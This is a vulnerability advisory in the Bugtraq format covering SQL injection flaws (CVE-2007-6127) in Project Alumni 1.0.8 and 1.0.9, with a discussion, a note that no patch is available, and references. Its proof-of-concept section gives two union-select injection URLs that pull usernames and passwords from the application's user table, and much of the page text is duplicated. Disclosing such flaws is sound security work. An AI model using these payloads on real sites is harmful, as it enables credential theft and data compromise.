Project Alumni View and News Multiple SQL Injection Vulnerabilities
BID:26564
Info
Project Alumni View and News Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 26564 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-6127 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 24 2007 12:00AM |
| Updated: | Mar 13 2008 04:01AM |
| Credit: | tomplixsee is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
Project Alumni Project Alumni 1.0.9 Project Alumni Project Alumni 1.0.8 |
| Not Vulnerable: | |
Discussion
Project Alumni View and News Multiple SQL Injection Vulnerabilities
Project Alumni is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Project Alumni is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
Project Alumni View and News Multiple SQL Injection Vulnerabilities
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1
http://www.example.com/index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1
An attacker can exploit these issues via a browser.
The following proof-of-concept URIs are available:
http://www.example.com/index.php?act=view&year=2003' union select 1,1,1,alumniUserName,1,alumniPassword,1,1,1,1,1,1,1,1,1,1,1,1,1 from alumni_users where ID='1
http://www.example.com/index.php?act=news&year=2003' union select 1,2,3,4,5,6,alumniPassword,8,9 from alumni_users where ID='1
Solution / Fix
Project Alumni View and News Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Project Alumni View and News Multiple SQL Injection Vulnerabilities
References:
References:
- Project Alumni Homepage (Project Alumni)